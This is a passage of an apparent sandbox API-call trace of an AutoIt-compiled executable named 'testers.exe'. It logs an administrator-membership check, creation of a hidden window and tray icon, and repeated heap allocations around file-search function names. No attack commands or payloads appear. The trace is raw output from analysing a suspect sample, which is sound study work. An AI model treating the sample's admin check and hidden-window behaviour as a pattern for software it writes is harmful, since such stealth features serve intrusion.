lpsz="MYERRFUNC") returned 0x9 [0071.143] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0071.143] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x60f850, lpFilePart=0x61f854 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x61f854*="testers.exe") returned 0x31 [0071.143] AllocateAndInitializeSid (in: pIdentifierAuthority=0x61f850, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x61f858 | out: pSid=0x61f858*=0x673b30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0071.143] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x673b30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x61f85c | out: IsMember=0x61f85c) returned 1 [0071.153] GetSysColorBrush (nIndex=15) returned 0x1100059 [0071.153] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0071.153] LoadIconW (hInstance=0x10000, lpIconName=0x63) returned 0x40243 [0071.154] LoadIconW (hInstance=0x10000, lpIconName=0xa4) returned 0x20247 [0071.155] LoadIconW (hInstance=0x10000, lpIconName=0xa2) returned 0x20241 [0071.156] LoadImageW (hInst=0x10000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x2023f [0071.156] RegisterClassExW (param_1=0x61f82c) returned 0xc121 [0071.156] GetSysColorBrush (nIndex=15) returned 0x1100059 [0071.156] RegisterClassExW (param_1=0x61f7d0) returned 0xc122 [0071.156] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c3 [0071.157] InitCommonControlsEx (picce=0x61f800) returned 1 [0071.158] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x68b790 [0071.158] LoadIconW (hInstance=0x10000, lpIconName=0xa9) returned 0x2023d [0071.159] ImageList_ReplaceIcon (himl=0x68b790, i=-1, hicon=0x2023d) returned 0 [0071.162] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x4011e [0071.163] NtdllDefWindowProc_W () returned 0x0 [0071.163] NtdllDefWindowProc_W () returned 0x1 [0071.166] NtdllDefWindowProc_W () returned 0x0 [0071.392] SetTimer (hWnd=0x4011e, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0071.392] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c3 [0071.392] CreatePopupMenu () returned 0x60129 [0071.393] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x4011e, hMenu=0x1, hInstance=0x10000, lpParam=0x0) returned 0x50114 [0071.609] NtdllDefWindowProc_W () returned 0x0 [0071.610] ShowWindow (hWnd=0x4011e, nCmdShow=0) returned 0 [0071.610] ShowWindow (hWnd=0x4011e, nCmdShow=0) returned 0 [0071.610] Shell_NotifyIconW (dwMessage=0x0, lpData=0x61f4a8) returned 1 [0071.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x68c358 [0071.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.635] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61f0d8) returned 1 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68c358 | out: hHeap=0x650000) returned 1 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.636] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.636] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759708 [0071.636] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x759708 | out: hHeap=0x650000) returned 1 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.636] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.636] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.636] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.636] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.637] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.637] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.637] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.637] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.637] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.637] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.637] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.637] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.637] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.637] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.637] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.637] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0071.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7709e8 | out: hHeap=0x650000) returned 1 [0071.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.638] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759708 [0071.638] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0071.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x759708 | out: hHeap=0x650000) returned 1 [0071.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766858 | out: hHeap=0x650000) returned 1 [0071.638] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769ea8 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769e78 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766858 [0071.638] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759708 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769db8 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766868 [0071.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769db8 | out: hHeap=0x650000) returned 1 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759758 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769db8 [0071.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769da0 [0071.639] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766878 [0071.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769da0 | out: hHeap=0x650000) returned 1 [0071.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766878 | out: hHeap=0x650000) returned 1 [0071.639] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759780 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769da0 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766878 [0071.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769da0 | out: hHeap=0x650000) returned 1 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7597a8 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769da0 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f20 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766888 [0071.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f20 | out: hHeap=0x650000) returned 1 [0071.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766888 | out: hHeap=0x650000) returned 1 [0071.639] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7597d0 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f20 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766888 [0071.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f20 | out: hHeap=0x650000) returned 1 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7597f8 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f20 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f38 [0071.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766898 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f38 | out: hHeap=0x650000) returned 1 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766898 | out: hHeap=0x650000) returned 1 [0071.640] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759820 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f38 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766898 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f38 | out: hHeap=0x650000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759848 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f38 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f50 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668a8 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f50 | out: hHeap=0x650000) returned 1 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668a8 | out: hHeap=0x650000) returned 1 [0071.640] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759870 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f50 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668a8 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f50 | out: hHeap=0x650000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x7709e8 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f50 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f68 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668b8 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f68 | out: hHeap=0x650000) returned 1 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f68 [0071.640] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668c8 [0071.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f68 | out: hHeap=0x650000) returned 1 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668c8 | out: hHeap=0x650000) returned 1 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759898 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f68 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668c8 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668c8 | out: hHeap=0x650000) returned 1 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f80 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668c8 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668c8 | out: hHeap=0x650000) returned 1 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f68 | out: hHeap=0x650000) returned 1 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f80 | out: hHeap=0x650000) returned 1 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x759898 | out: hHeap=0x650000) returned 1 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668b8 | out: hHeap=0x650000) returned 1 [0071.641] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759898 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f80 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668b8 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f80 | out: hHeap=0x650000) returned 1 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7598c0 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f80 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f68 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668c8 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f68 | out: hHeap=0x650000) returned 1 [0071.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668c8 | out: hHeap=0x650000) returned 1 [0071.641] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.641] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7598e8 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f68 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668c8 [0071.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f68 | out: hHeap=0x650000) returned 1 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770a20 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f68 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f98 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668d8 [0071.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f98 | out: hHeap=0x650000) returned 1 [0071.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668d8 | out: hHeap=0x650000) returned 1 [0071.642] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759910 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f98 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668d8 [0071.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769f98 | out: hHeap=0x650000) returned 1 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770a58 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769f98 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fb0 [0071.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668e8 [0071.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fb0 | out: hHeap=0x650000) returned 1 [0071.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668e8 | out: hHeap=0x650000) returned 1 [0071.642] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759938 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fb0 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668e8 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fb0 | out: hHeap=0x650000) returned 1 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770a90 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fb0 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7668f8 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fc8 | out: hHeap=0x650000) returned 1 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759960 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766908 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766908 | out: hHeap=0x650000) returned 1 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fe0 [0071.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766908 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766908 | out: hHeap=0x650000) returned 1 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fc8 | out: hHeap=0x650000) returned 1 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fe0 | out: hHeap=0x650000) returned 1 [0071.643] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x759960 | out: hHeap=0x650000) returned 1 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7668f8 | out: hHeap=0x650000) returned 1 [0071.644] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759960 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fe0 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7668f8 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fe0 | out: hHeap=0x650000) returned 1 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759988 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fe0 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766908 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fc8 | out: hHeap=0x650000) returned 1 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7599b0 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766918 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766918 | out: hHeap=0x650000) returned 1 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769ff8 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766918 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766918 | out: hHeap=0x650000) returned 1 [0071.644] RtlAllocateHeap 